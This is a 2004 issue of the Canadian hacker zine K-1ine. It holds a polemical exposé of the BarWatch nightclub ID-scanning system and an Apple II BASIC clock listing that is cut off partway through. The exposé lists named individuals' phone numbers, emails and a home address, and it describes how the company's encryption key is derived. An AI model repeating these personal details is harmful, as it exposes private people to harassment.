Copy Link
Add to Bookmark
Report
k-1ine_44
fW#####E f#####E ;fE# ,fE####Ek GE###G `G###f G###########L
t###WK` .t#Kf ,GW#### f##E f#E##E. #; t###:'"'f###'
E##f .j#f' fKlG##E f##E f# G##W: #; ###; '##;
E##f :E#" f##E f##E f# j###, #; ###; ; L#;
E##i t#P' f##E f##E f# t###, #; ###; .#; k;
###; j#i f######' f##E f##E f# ;###,#; E##j f#; '
###iE##t ,######P D##E f##K f# ;####; E######;
########j ,E##K;, ,K##E, ,f#j ;###f E##Li##;
###fW####L ,jKWEG##1; GWDW#ftj GDj#R, ;##f G##f t#;
### 'E####E. jP"'` `" i#f f##E #;
.### f####WEj,, tj f##E ';
:### ;####jt' .,;ttjffjjjjti;:,, ,jK##E '
;### f#B" .;fDKW################WWELt;. "G###: .t
;###, j' ,ffK##WWWWW######W##W#W###WWWW##WDfi. `tE#L. ff
j####L ;fWWWWWW#WEff"' '"fDW##WWW#WDf. `iK#Dj;L#j
E##Kl' ,dKWWW###L" 'ifW#WWW##Db `ifW###;
:K#B" ;G##WW##D, 'iKDW#WW#Wb, `ijW#;
fL" .fWWWKWE;t#Kf, + :L#WE''j##WW##b 'j#'
j' d#WWKWE" ##WWKf. fEWWWWi i#WWWWE; Y
,EWWWW#' '#WWW##Ej ,f##WWW#E f#WWK#j
;##WWKP G#WWW####Gt jKWK#WKW#W: DWWWWG
;#WW##" ##WK,t##W##L; ;G##W#Dit#W## f#WW#E.
,#WW#W" :###D `D##W##f. ,K#W##l' ###K: f#WW#K
.#WW#W" D#W#f tW#KK###W#Et G#W#f KWWW#E
fWWW#f `W##W: .f##Cyb#Di #W#E' ##WW#;
.#WW#D + i#### fKW##WLf##W##L. WWW#; + '#WW##,
;#WW#' L#WWD##K##f ;D##W#KWW#E '#WW#;
#WW#W ,f#WWWWWL; fDWWWW#j, #WW#G
#WW#G ,jE##WWWW# ;#WWW##Gj, GWWWW
#WW#L ,jE##W##fLWW#t k :#WW#f##W##f;, k###W
#WW#G ,L##W##D' KWW#. G#W#i "D##W#WL: YWW#K
#WW#K .fWWW##G" '#WWW j#WWW 'iDW#WWWf. kWW#W
f#WW#. .fWWWWWKf' iKW#f .K#WK "fWKW#WKi. .#WW#f
###########################################################################
##:K-1INE:NVMBER:FORTY-FOVR::BIGGER:THAN:JESVS::AVGVST:TWO-THOVSAND-FOVR:##
###########################################################################
f#####, #f' ##### ##### f##### #i
f#####f ff' ##### ##### f##### #i
`#####fff' ##### ##### f##### #i
f#####, ##### + ##### f##### #i
f#####f ##### ##### f##### #i
#`#####f ##### ##### f####f ff
ff f#####, ##### ,# ##### #####ff
ff' f#####i ##### ,d#f ##### ####f
f## `######. ##### .ff##' ##### ##K
###########################################################################
##:K-1INE:NVMBER:FORTY-FOVR::BIGGER:THAN:JESVS::AVGVST:TWO-THOVSAND-FOVR:##
###########################################################################
# #
#:. -: RANDOM WORDS :- .:#
# #
# [6] Introduction . . . . . . . . . . . . . . . . . . . . . . The Clone #
# [6] Contact Information . . . . . . . . . . . . . . . . . . The Clone #
# [6] Link of the Quarter . . . . . . . . . . . . . . . . . . The Clone #
# [6] K-1ine Mirrors . . . . . . . . . . . . . . . . . . . . . The Clone #
# #
#:. -: DOCVMENTS :- .:#
# #
# [6] BarWatch: Personal Privacy? Like We Care! . . . . . . CYB0RG/ASM #
# [6] ][.SQR.CLOCK . . . . . . . . . . . . . . . . . . . . . CYB0RG/ASM #
# [6] Canada Post: A Phackers Guide . . . . . . . . . . . . CYB0RG/ASM #
# [6] Canada... No Fetus Can Beat Us . . . . . . . . . . . . MsOgynis #
# [6] My telco admitted I had a tap on my line . . . . . . . The Clone #
# [6] ASCII Armour Encoding . . . . . . . . . . . . . . . . Fractal #
# [6] Un-activated Telus cellphone exploit . . . . . . . . . Tr00per #
# [6] The Complete Guide to the GTD-5 EAX . . . . . . . . . H1D30U5 #
# [6] The Nettwerked After Meeting Trashing Adventure . . . Jackel #
# [6] Hope 5: A Salute to Fascism! . . . . . . . . . . . . . Kybo Ren #
# [6] DISMANTLING DES . . . . . . . . . . . . . . . . . . . Aestetix #
# [6] Buffer Overflows - taking a different approach . . . . Omin0us #
# [6] PHP (In)Security . . . . . . . . . . . . . . . . . . . Sub #
# [6] Simple NetBIOS worm . . . . . . . . . . . . . . . . . Aftermath #
# [6] The Wonderful World of ARP Poisoning . . . . . . . . . Sub #
# [6] BrainFuck Programming Tutorial . . . . . . . . . . . . Omin0us #
# #
#:. -: CONCLVSION :- .:#
# #
# [6] Credits . . . . . . . . . . . . . . . . . . . . . . . . The Clone #
# [6] Shouts . . . . . . . . . . . . . . . . . . . . . . . . . The Clone #
# #
###########################################################################
##:K-1INE:NVMBER:FORTY-FOVR::BIGGER:THAN:JESVS::AVGVST:TWO-THOVSAND-FOVR:##
###########################################################################
###0#1########0###1##########1#1#######0##########0###1###########1##1##0##
##0#1#0#0##1010###10###10#1#1#10###10###0##0##0##01#0##10#0##1#0#0####0#10#
0011#0101#110101001#1011010#1001010110010#01010110101#001010101#01010##1010
101010#11110101#101001010101101#01#10100101011010#110101011#101001011001010
101101 010 10 101010 0101 101 0100 101 010101 10 10 101 10 1 010 10 1011 0
01010 10 01 101 01 1 1 0 0 1 01 01 010 1 0 01 01 1 1 01 01 01 01 1
0 0 0 1 01 0 1 1 1 01 0 1 0 1 1 0 1 01 0 01
1 1 1 00 0 1 0 1 1 0 1 0 1 1
0 1 0 1 11 1 1 1 0 0 1 0
1 0 1 1 1 1
_ xxxx _
/_;-.__ / _\ _.-;_\
`-._`L`_/'`.-' 0
`\ /`
1 ) /
/-.(
\_._\
\ \ \
) )/
/ //
|//
\(\
``
+
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
This issue is dedicated to:
Robert W. Beamer
Inventor of ASCII and the
COBAL Programming Language
[Died July 9th at age 84]
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
Introduction:
Welcome to the Summer issue of K-1ine Magazine!
2600 Magazine turns 20 years old this summer, Cult of the Dead Cow also turns 20,
and K-1ine Magazine releases its forty forth issue; the best zine release so far.
Thanks to everyone who contributed their philes; your hard work is appreciated.
Now prepare for something LARGE, something HUGE,
something so elite it's even bigger than Jesus...
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
Contact Information;
|*> Comments/Questions/Submissions: theclone@hackcanada.com
|*> Check out my site: (Nettwerked) http://www.nettwerked.net
|*> Check out the Web-forum: http://nettwerked.mg2.org/phpBB2/
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
--=[ LINK OF THE QUARTER ]=--
Every quarter I post one really great "link of the quarter" on each issue
of K-1ine magazine. The link can be anything in the technology industry,
music scene, rave scene, punk scene, or even a good article you read on
a news site. I'll be taking submissions via e-mail or IRC right away; so
get your links in and maybe you'll see it in the next issue of K-1ine!
For the Summer, the link of the quarter is:
http://atomfilms.shockwave.com/af/content/this_land_af
George W. Bush and John Kerry go at it in this hilarious video.
[submitted by: The Clone]
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
K-1ine Magazine Mirrors:
http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/
(Now mirrored in two places, one in Belgium and another in Sydney)
"Wiretapped.net is an archive of open source software, informational
textfiles and radio/conference broadcasts covering the areas of network
and information security, network operations, host integrity, cryptography
and privacy, among others. We believe we are now the largest archive of
this type of software & information, hosting in excess of 20 gigabytes of
information mirrored from around the world."
--
http://www.hackcanada.com/canadian/zines/index.html#K-1ine
Hack Canada - Canadian H/P - E-Zines
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
_ _____ ______ _ _ _ _ _
| | | ___| | __ \ (_)(_)(_) (_) | |
| |_| |___ | |__) ) _____ ____ _ _ _ _____ _____ ____ | |___
|___ _ | | __ ( (____ | / ___)| || || |(____ |(_ _) / ___)| _ \
___| | | | | |__) )/ ___ || | | || || |/ ___ | | |_ ( (___ | | | |
|_____| |_| |______/ \_____||_| \_____/ \_____| \___) \____)|_| |_|
BARWATCH : PERSONAL PRIVACY? LIKE WE CARE! -- CYB0RG/ASM 2004
Imagine having a security system that steals your customers personal
information. Then, imagine using their information for direct marketing
without their consent . . .
.-----------------------------------------------------------.
| |
| Introducing BarWatch, the ultimate privacy invading |
| and evil marketing system for today's clubs! |
| |
`-----------------------------------------------------------'
BarWatch rakes your customers right to privacy over a cheese grater while
we abuse their personal information for huge profits and laugh all the way
to the bank!
And the best part is the customers are too stupid to care!
BarWatch We take your personal information without your permission.
BarWatch We lie about what we do with your personal information.
BarWatch We give out your personal information without your consent.
BarWatch We help the Police keep tabs on you.
BarWatch We break the law and the Police support it.
WHAT IS GOING ON?
Friday June 4, 2004. The doorman at the bar asked for my ID. I'm clearly over
18, but whatever. The guy grabs my ID and turns around and stuffs it into some
machine. Wait, what's happening here? Too late. I force my way around the guy
and see a copy of my drivers license on the computer screen and this tacky
looking interface that says "BarWatch."
"What the hell is that," I demand, pointing at the screen?
"Blah, blah, lies, it's for the clubs protection, blah blah, lies," replies
the goon.
"Who owns this? Who's getting my data? Why did you scan an image of my whole
license!?"
"Oh, it's just our club, lies, the police, blah blah, lies, RCMP blah, more
lies, our protection, see how I lie. Nobody has your information, it's just
so other clubs know if you've been in trouble, blah, and did you like that
big lie?"
"Your protection!? What about my personal privacy!?"
Blank stare.
BARWATCH FACTS
> What BarWatch is doing is ILLEGAL! And yet it is supported by the POLICE!
Under the Personal Information Protection and Electronic Documents Act
(www.privcom.gc.ca/information/02_05_d_08_e.asp)
"*The law requires organizations to:*
* obtain your consent when they collect, use or disclose your personal
information;
* supply you with a product or a service even if you refuse consent for
the collection, use or disclosure of your personal information unless
that information is essential to the transaction;
* collect information by fair and lawful means; and
* have personal information policies that are clear, understandable and
readily available."
> BarWatch's actual history is dubious and unavailable. At this point we are
unable to determine precisely where it was started, when it was started, and
who originated it. There appear to be several different geographically
disparate groups using the name BarWatch.
> BarWatch in Edmonton is a joint venture between local business owners,
Edmonton Police Service, Emergency Response Department, Alberta Gaming and
Liquor Commission, City of Edmonton Licensing Departments, West Edmonton Mall
Security, Operation Red Nose, and Keys Please.
> Jeff Christie, President of Panacea Data Management Corp., one of the
principal companies behind the Edmonton BarWatch System, tells our source
that "Edmonton Police Sergeant Gary McCarthy (780-496-8525) approached me
(Jeff Christie) to do this project."
> Jeff Christie has readily and willingly divulged via e-mail how their data
is encrypted and how to decrypt it! He told this to someone he didn't even
know! Read on, we'll give you all the details in Jeff's own words further
down the page.
> The BarWatch reader actually SCANS your whole ID, it doesn't just read the
barcode. This enables them to steal your picture, your home address, your
birthday, your height, your weight, and your signature.
> BarWatch programs have also been started in Vancouver, Seattle, Portland,
and who knows where else.
> It is a requirement for all businesses using the BarWatch System to install a
video camera and VCR to film customers entering and using the establishment.
> The BarWatch website (www.barwatch.ca) claims that the customer is informed
and must offer consent before their data is collected. It is clear that this
is a blatant lie as the people working the door snatch your ID and scan it
before you even know what is happening. Other BarWatch sites claim that
signage and other information explaining the BarWatch system is posted at
the establishment using it. This is also a blatant lie.
> The BarWatch website also claims that only "authorized staff" at the clubs
will be able to view the customer's private data and that the data will not
be transferred to any other party without the customers consent. The site
also states that they will provide your information to other persons "where
the other parties are our participating clubs who assist us in serving you."
Ok, so that's basically anyone willing to buy the information. Plus don't
forget law enforcement.
> The BarWatch website states that your personal information will also be used
for direct mail and telephone marketing.
> The day after this article first appeared (2004-09-06) all of the pages on
BarWatch.ca were taken off the server (2004-06-10) and replaced with an under
construction message. We grabbed a copy of the old site from google cache
though. =)
> Systems similar to this are popping up in clubs all over the world.
> You have no idea where this information is going and BarWatch sure isn't
telling the truth about it.
IMPLICATIONS
You may be saying "So what? I have nothing to hide."
If that is the case you are a gullible idiot and are part of the problems
currently plaguing our crumbling society. You don't deserve the last measly
remnants of privacy and freedom that you still barely have. Privacy is a
fundamental value in a democratic society.
"Privacy is related entirely to the degree to which we respect each other as
unique individuals, each with our own sets of values which we are entitled to
make known or not as we see fit. To truly respect your neighbour, you must
grant that person a private life. Respecting one another's privacy means the
difference between a life of liberty, autonomy and dignity, and a hollow and
intimidating existence under a cloud of constant oppressive surveillance."
Bruce Phillips, Privacy Commissioner of Canada, 1999
Here are some plausable potential abuses of the information in the BarWatch
database:
1. When the auto insurance companies start buying this data from BarWatch to
see how often you visit the bar what do you think is going to happen to
your already inflated insurance rates?
2. Warrant out for your arrest? Too many traffic tickets? I'm sure the alarm
bells will sound at the nearest police station as soon as your ID is scanned
into BarWatch. The Police can just swing by to pick you up.
3. A cop stops you and it indicates on his Mobile Data Terminal that you were
scanned into the BarWatch system at a bar nearby 4 hours ago. Step out of
the car please...
4. Try getting affordable life insurance when they can check with BarWatch to
see how often you go out drinking.
5. Criminals break into the BarWatch database and begin creating duplicate ID's
from the images of your ID which are stored on the BarWatch system. With
those ID cards they can then easily open bank accounts, get credit cards,
rent cars and other equipment, all in your name and you will be held
responsible by authorities.
6. Prospective employers check with BarWatch before hiring you to see how you
spend your off-hours.
7. Alternative lifestyle? Do you want just anyone finding out about the
stripper bars or gay clubs you've been going to? Employers? Insurance
companies? Your family? BarWatch knows all your secrets.
Can face recognition and DNA tracking in every establishment be far behind?
Not at all. Machines which can suck a DNA sample off of you from a distance
have been available since the year 2000. (Canada's DNA Database: Privacy's
last stronghold destroyed, CybØrg/ASM, July 21, 2000,
www.hackcanada.com/canadian/freedom/canadna.html) And face recognition is
already being adopted in a variety of venues around the world.
Are you scared yet? Outraged? You better be! What BarWatch is doing is in
violation of Canada's Privacy Laws.
Write our privacy commissioner now stating your opposition to this BarWatch
privacy invasion system. (http://www.privcom.gc.ca/) Demand that action be
taken to shut down the BarWatch network.
The Office of the Privacy Commissioner of Canada
112 Kent Street
Place de Ville
Tower B, 3rd Floor
Ottawa, Ontario
K1A 1H3
Do it now!
"SNOOP UNTO THEM AS THEY SNOOP UNTO US." -- HACKERS (1995)
So, just where is this BarWatch data stored? How secure is it?
In Edmonton...
BarWatch.ca is hosted at tera-byte.com by some reseller on a Linux server.
(75-hosting.com) The software appears to be written in PHP and MySQL.
Historically not the most secure development platform. And we don't really
know who all has access to it. Nice.
Also, Jeff Christie of Edmonton BarWatch readily reveals to one of our
sources that "we (BarWatch) use an encryption key that is based off the
barcode number that was used to create the account. Therefore every line
in the db (database) had a different key used to create it. So to me, or
anyone else all the data looks like is garbage without the decryption key...
your (drivers license) barcode number."
Gee thanks, Jeff. Telling unknown people exactly how your encryption works
and how to decrypt the data totally defeats the point of using encryption
in the first place. What an amateur operation. And the Police support and
approve of this?!
In Vancouver...
RT writes: "The Software & Hardware is developed by a Vancouver company
called Treoscope. The product used in the Barwatch network is called
'Vigilance'. www.treoscope.com/VSS1b.html provides a chilling look into
some of the 'features'. The day to day administration of the network is
performed by a company called Genesis Security."
The software I saw in the bar had pretty much the same features as shown on
the Vigilance page, but it had the tacky BarWatch interface applied to it
much like this webpage.
This Genesis Security (www.genesissecurity.com) website states "As a member
for the last seven years of Vancouver's Barwatch, an industry association
representing 22 nightclubs in the downtown core, we have developed new
approaches to the issues facing the nightclub industry and downtown property
owners. We work closely with the Vancouver Police Department and nightclub
industry representatives to develop and refine our unique service capability
in crowd management and patron control."
Who are the people behind BarWatch?
Barwatch.ca and pdmc.biz
Toll-free: 1-866-443-0567
info@barwatch.ca, feedback@barwatch.ca
Jeff Christie, President
Panacea Data Management Corp.
18511 - 50 Avenue
Edmonton, AB, T6M 2R3
Phone: 780-443-0567
Fax: 780-481-2147
Fax toll-free: 1-888-488-2147
jeff@pdmc.biz, info@pdmc.biz
Technical Contact:
Brad Moore
brad@barwatch.ca
Vance Campbell - [picture]
Vancouver, BC
vice-president, chair, and spokesman for Barwatch
vice-president of Granville Entertainment Group
Bradley Darren Shende, BARWATCH, Vancouver, Founder
vm: 604.686.9262 fax: 604.687.1609
bshende@canada.com pagebradley@canada.com
www.geocities.com/bradleyshend
John Teti, Barwatch chair, BC
75-hosting.com and affordable-data-center.com
Administrative Contact:
Beima, John
jbeima@palb.com
11639-122 Street
Basement Suite
Edmonton, AB, T5M 0B6
Phone: (780)451-1086
Fax: (780)447-4760
If you have any further information regarding BarWatch, the people behind it,
or any clubs that are using it, please LET US KNOW.
DO YOUR PART -- BOYCOTT ALL ESTABLISHMENTS USING BARWATCH
Be alert when entering a club. Make sure they are not using BarWatch before
allowing the doorman to see your ID. The following clubs are known to be using
BarWatch. They clearly don't care about your personal privacy and safety at
all. Call some of these places, ask to speak to a manager, and tell them you
will never go to their club again until they get rid of BarWatch.
Canada
Alberta
Calgary
Outlaws, #24 7400 Mcleod Trail, (403) 255-4646
Tantra Nightclub & Lounge, 355-10th Ave SW, (403) 264-0202
The Den and Black Lounge, U of C - MacEwan Hall, (403) 220-6551
??? - Where else?
Edmonton
Barry T's, 6111 104 Street NW, (780) 438-2582
Club Malibu, 10310 85 Ave NW, (780) 432-7300
Cowboys, 10102 180 Street NW, (780) 481-8739
Diamonds Gentlemen's Club, 4635 Gateway Blvd, (780) 428-2527
Greenhouse, 13103 Fort Rd, (780) 472-9898
Iron Horse, 8101 103 St, (780) 438-1907
Nashville's Electric Roadhouse, 2557 WEM 8770-170 St, (780) 489-1330
Purple Onion, 8032 104 St, (780) 433-9616
Red's, #2556, 8882 - 170 St. West Edmonton Mall, (780) 481-6420
Rum Jungle, 2687-8882 170 St. West Edmonton Mall, (780) 486-9494
The Joint Nightlife, 8882-170 St. West Edmonton Mall, (780) 486-3013
The Juice, 8770 170 St, (780) 444-5999
Tonic After Dark, 9920 - 62 Avenue, (780) 408-2877
??? - Where else?
British Columbia
Vancouver
Au Bar, 674 Seymour St, (604) 648-2227
Caprice Nightclub, 967 Granville Street, (604) 681-2114
Plaza Nightclub, 881 Granville Street, (604) 646-0064
Roxy Nightclub, 932 Granville Street, (604) 331-7999
Skybar, 670 Smithe Street, (604) 697-9199
Stone Temple, 1082 Granville Street, (604) 488-1333
The Shark Club, 180 West Georgia St, (604) 687-4275
Tonic, 919 Granville Street, (604) 669-0469
??? - Where else?
BE INFORMED -- PROTECT YOURSELF
"Privacy is the claim of individuals, groups, or institutions to
determine for themselves when, how, and to what extent information
about them is communicated to others." -- Professor Alan Westin, 1967
Copyright (c) 2004
www.hackcanada.com
http://www.hackcanada.com/canadian/freedom/barwatch/barwatch.html
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
-
<tek> my daddy took away my credit card! ATTENTION EVERYONE:
I will now slit my wrists and write poor poetry about it!
<tek> i like songs about the word woah and nah-nah
-
-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-X-x-
___ ___
|_ || _| _____ _____ _____ _____ __ _____ _____ _____
| || | | __|| || __ | | || | | || || | |
| || | _ |__ || | || -| _ | --|| |__ | | || --|| -|
_| || |_ |_||_____||__ _||__|__||_||_____||_____||_____||_____||__|__|
|___||___| |__|
CYB0RG/ASM
2004.07.07
The Apple ][ will always hold a special place in my memories. It is the machine
I first learned to code on back around 1981. In my youth I never did own my own
computer. But now the old Apple's have sought me out in need of a home. In
recent years I have come to shelter 3 of them. Two ][e's and a ][c. Now I code
on them again.
I wanted to write something functional, and aesthetically pleasing. Something
useful for my Apples to do besides very slowly calculating pi or fibonacci
sequences, and warming my home in the winter. A clock. But not just any clock.
A square clock. A square clock with hands that actually elongate and contract
as they follow the square shape of the clockface. How boss would that be? Well,
here it is in all its mode HGR2 Applesoft BASIC bossness. ][.SQR.CLOCK.
. . . o . . . Note: Timing is handled by the FOR / NEXT loop on line
. | , . 1700 which provides the delay for each tick of the
. |/ . second hand. If your clock runs fast or slow, simply
o + o tweak this loop until you get it on time. If you need
. / . finer granularity, delay loops could also be added on
. / . lines 1735 and 1805 to add delays every minute and hour
. . . o . . . respectively.
10 REM -- ][.SQR.CLOCK
20 REM -- BY CYB0RG/ASM
30 REM -- COPYRIGHT (C) 2004
40 REM -- WWW.HACKCANADA.COM
50 TEXT
60 HOME
70 DIM A(60,2) : REM MINS/SECS
80 DIM B(60,2) : REM HOURS
100 A(0,0) = 139 : A(0,1) = 6
110 A(1,0) = 149 : A(1,1) = 6
120 A(2,0) = 158 : A(2,1) = 6
130 A(3,0) = 168 : A(3,1) = 6
140 A(4,0) = 179 : A(4,1) = 6
150 A(5,0) = 191 : A(5,1) = 6
160 A(6,0) = 204 : A(6,1) = 6
170 A(7,0) = 220 : A(7,1) = 6
180 A(8,0) = 238 : A(8,1) = 6
190 A(9,0) = 262 : A(9,1) = 6
200 A(10,0) = 273 : A(10,1) = 18
210 A(11,0) = 273 : A(11,1) = 35
220 A(12,0) = 273 : A(12,1) = 51
230 A(13,0) = 273 : A(13,1) = 67
240 A(14,0) = 273 : A(14,1) = 81
250 A(15,0) = 273 : A(15,1) = 95
260 A(16,0) = 273 : A(16,1) = 109
270 A(17,0) = 273 : A(17,1) = 123
280 A(18,0) = 273 : A(18,1) = 138
290 A(19,0) = 273 : A(19,1) = 154
300 A(20,0) = 273 : A(20,1) = 172
310 A(21,0) = 264 : A(21,1) = 185
320 A(22,0) = 240 : A(22,1) = 185
330 A(23,0) = 221 : A(23,1) = 185
340 A(24,0) = 206 : A(24,1) = 185
350 A(25,0) = 192 : A(25,1) = 185
360 A(26,0) = 180 : A(26,1) = 185
370 A(27,0) = 169 : A(27,1) = 185
380 A(28,0) = 159 : A(28,1) = 185
390 A(29,0) = 150 : A(29,1) = 185
400 A(30,0) = 139 : A(30,1) = 185
410 A(31,0) = 129 : A(31,1) = 185
420 A(32,0) = 120 : A(32,1) = 185
430 A(33,0) = 110 : A(33,1) = 185
440 A(34,0) = 99 : A(34,1) = 185
450 A(35,0) = 87 : A(35,1) = 185
460 A(36,0) = 74 : A(36,1) = 185
470 A(37,0) = 58 : A(37,1) = 185
480 A(38,0) = 39 : A(38,1) = 185
490 A(39,0) = 15 : A(39,1) = 185
500 A(40,0) = 6 : A(40,1) = 172
510 A(41,0) = 6 : A(41,1) = 154
520 A(42,0) = 6 : A(42,1) = 138
530 A(43,0) = 6 : A(43,1) = 123
540 A(44,0) = 6 : A(44,1) = 109
550 A(45,0) = 6 : A(45,1) = 95
560 A(46,0) = 6 : A(46,1) = 81
570 A(47,0) = 6 : A(47,1) = 67
580 A(48,0) = 6 : A(48,1) = 51
590 A(49,0) = 6 : A(49,1) = 35
600 A(50,0) = 6 : A(50,1) = 18
610 A(51,0) = 17 : A(51,1) = 6
620 A(52,0) = 41 : A(52,1) = 6
630 A(53,0) = 60 : A(53,1) = 6
640 A(54,0) = 75 : A(54,1) = 6
650 A(55,0) = 88 : A(55,1) = 6
660 A(56,0) = 100 : A(56,1) = 6
670 A(57,0) = 111 : A(57,1) = 6
680 A(58,0) = 121 : A(58,1) = 6
690 A(59,0) = 130 : A(59,1) = 6
700 B(0,0) = 139 : B(0,1) = 32
710 B(1,0) = 146 : B(1,1) = 32
720 B(2,0) = 153 : B(2,1) = 32
730 B(3,0) = 160 : B(3,1) = 32
740 B(4,0) = 167 : B(4,1) = 32
750 B(5,0) = 176 : B(5,1) = 32
760 B(6,0) = 185 : B(6,1) = 32
770 B(7,0) = 196 : B(7,1) = 32
780 B(8,0) = 209 : B(8,1) = 32
790 B(9,0) = 226 : B(9,1) = 32
800 B(10,0) = 231 : B(10,1) = 42
810 B(11,0) = 231 : B(11,1) = 54
820 B(12,0) = 231 : B(12,1) = 65
830 B(13,0) = 232 : B(13,1) = 75
840 B(14,0) = 232 : B(14,1) = 85
850 B(15,0) = 232 : B(15,1) = 95
860 B(16,0) = 232 : B(16,1) = 105
870 B(17,0) = 232 : B(17,1) = 115
880 B(18,0) = 231 : B(18,1) = 125
890 B(19,0) = 231 : B(19,1) = 135
900 B(20,0) = 231 : B(20,1) = 148
910 B(21,0) = 226 : B(21,1) = 158
920 B(22,0) = 210 : B(22,1) = 158
930 B(23,0) = 197 : B(23,1) = 158
940 B(24,0) = 186 : B(24,1) = 158
950 B(25,0) = 176 : B(25,1) = 158
960 B(26,0) = 168 : B(26,1) = 158
970 B(27,0) = 160 : B(27,1) = 158
980 B(28,0) = 153 : B(28,1) = 158
990 B(29,0) = 147 : B(29,1) = 158
1000 B(30,0) = 139 : B(30,1) = 158
1010 B(31,0) = 132 : B(31,1) = 158
1020 B(32,0) = 126 : B(32,1) = 158
1030 B(33,0) = 119 : B(33,1) = 158
1040 B(34,0) = 111 : B(34,1) = 158
1050 B(35,0) = 103 : B(35,1) = 158
1060 B(36,0) = 93 : B(36,1) = 158
1070 B(37,0) = 82 : B(37,1) = 158
1080 B(38,0) = 69 : B(38,1) = 158
1090 B(39,0) = 52 : B(39,1) = 158
1100 B(40,0) = 47 : B(40,1) = 148
1110 B(41,0) = 47 : B(41,1) = 136
1120 B(42,0) = 47 : B(42,1) = 125
1130 B(43,0) = 46 : B(43,1) = 115
1140 B(44,0) = 46 : B(44,1) = 105
1150 B(45,0) = 46 : B(45,1) = 95
1160 B(46,0) = 46 : B(46,1) = 85
1170 B(47,0) = 46 : B(47,1) = 75
1180 B(48,0) = 47 : B(48,1) = 65
1190 B(49,0) = 47 : B(49,1) = 54
1200 B(50,0) = 47 : B(50,1) = 41
1210 B(51,0) = 53 : B(51,1) = 32
1220 B(52,0) = 70 : B(52,1) = 32
1230 B(53,0) = 83 : B(53,1) = 32
1240 B(54,0) = 94 : B(54,1) = 32
1250 B(55,0) = 103 : B(55,1) = 32
1260 B(56,0) = 112 : B(56,1) = 32
1270 B(57,0) = 119 : B(57,1) = 32
1280 B(58,0) = 126 : B(58,1) = 32
1290 B(59,0) = 132 : B(59,1) = 32
1300 INPUT "HOUR: "; H
1310 INPUT "MINUTES: "; M
1320 HGR2
1330 REM CODIFY HOUR
1340 IF H = 12 THEN H = 0
1350 H = INT ((H * 5) + (M / 12))
1360 REM DRAW CLOCK FACE
1370 HCOLOR=7
1380 HPLOT 149,1 : HPLOT 159,1 : HPLOT 170,1 : HPLOT 181,1
1390 HPLOT 192,0 TO 192,2 : HPLOT 193,0 TO 193,2 : HPLOT 194,0 TO 194,2
1400 HPLOT 207,1 : HPLOT 224,1 : HPLOT 243,1 : HPLOT 268,1
1410 HPLOT 277,14 TO 277,16 : HPLOT 278,14 TO 178,16 : HPLOT 279,14 TO 279,16
1420 HPLOT 278,33 : HPLOT 278,50 : HPLOT 278,66 : HPLOT 278,81
1430 HPLOT 277,94 TO 277,96 : HPLOT 278,94 TO 278,96 : HPLOT 279,94 TO 279,96
1440 HPLOT 278,109 : HPLOT 278,124 : HPLOT 278,140 : HPLOT 278,156
1450 HPLOT 277,172 TO 277,174 : HPLOT 278,172 TO 278,174 : HPLOT 279,172 TO 279,174
1460 HPLOT 270,190 : HPLOT 245,190 : HPLOT 225,190 : HPLOT 209,190
1470 HPLOT 192,189 TO 192,191 : HPLOT 193,189 TO 193,191 : HPLOT 194,189 TO 194,191
1480 HPLOT 182,190 : HPLOT 171,190 : HPLOT 159,190 : HPLOT 150,190
1490 HPLOT 138,189 TO 138,191 : HPLOT 139,189 TO 139,191 : HPLOT 140,189 TO 140,191
1500 HPLOT 129,190 : HPLOT 119,190 : HPLOT 108,190 : HPLOT 97,190
1510 HPLOT 85,189 TO 85,191 : HPLOT 86,189 TO 86,191 : HPLOT 87,189 TO 87,191
1520 HPLOT 71,190 : HPLOT 54,190 : HPLOT 34,190 : HPLOT 9,190
1530 HPLOT 0,172 TO 0,174 : HPLOT 1,172 TO 1,174 : HPLOT 2,172 TO 2,174
1540 HPLOT 1,156 : HPLOT 1,140 : HPLOT 1,124 : HPLOT 1,109
1550 HPLOT 0,94 TO 0,96 : HPLOT 1,94 TO 1,96 : HPLOT 2,94 TO 2,96
1560 HPLOT 1,81 : HPLOT 1,66 : HPLOT 1,50 : HPLOT 1,33
1570 HPLOT 0,14 TO 0,16 : HPLOT 1,14 TO 1,16 : HPLOT 2,14 TO 2,16
1580 HPLOT 11,1 : HPLOT 36,1 : HPLOT 56,1 : HPLOT 72,1
1590 HPLOT 85,0 TO 85,2 : HPLOT 86,0 TO 86,2 : HPLOT 87,0 TO 87,2
1600 HPLOT 98,1 : HPLOT 109,1 : HPLOT 120,1 : HPLOT 130,1
1610 HPLOT 138,0 TO 138,2 : HPLOT 139,0 TO 139,2 : HPLOT 140,0 TO 140,2
1620 REM CENTERPOINT
1630 X = 139 : Y = 95
1640 REM MAINLOOP
1650 FOR S = 0 TO 59
1660 HCOLOR=7
1670 HPLOT X,Y TO A(S,0),A(S,1)
1680 HPLOT X,Y TO A(M,0),A(M,1)
1690 HPLOT X,Y TO B(H,0),B(H,1)
1700 FOR I=0 TO 667: NEXT I
1710 HCOLOR=0
1720 HPLOT X,Y TO A(S,0),A(S,1)
1730 NEXT S
1740 HPLOT X,Y TO A(M,0),A(M,1)
1750 M = M + 1
1760 IF M = 60 THEN M = 0
1770 IF (M<>0) AND (M<>12) AND (M<>24) AND (M<>36) AND (M<>48) THEN GOTO 2000
1780 HPLOT X,Y TO B(H,0),B(H,1)
1790 H = H + 1
1800 IF H = 60 THEN H = 0
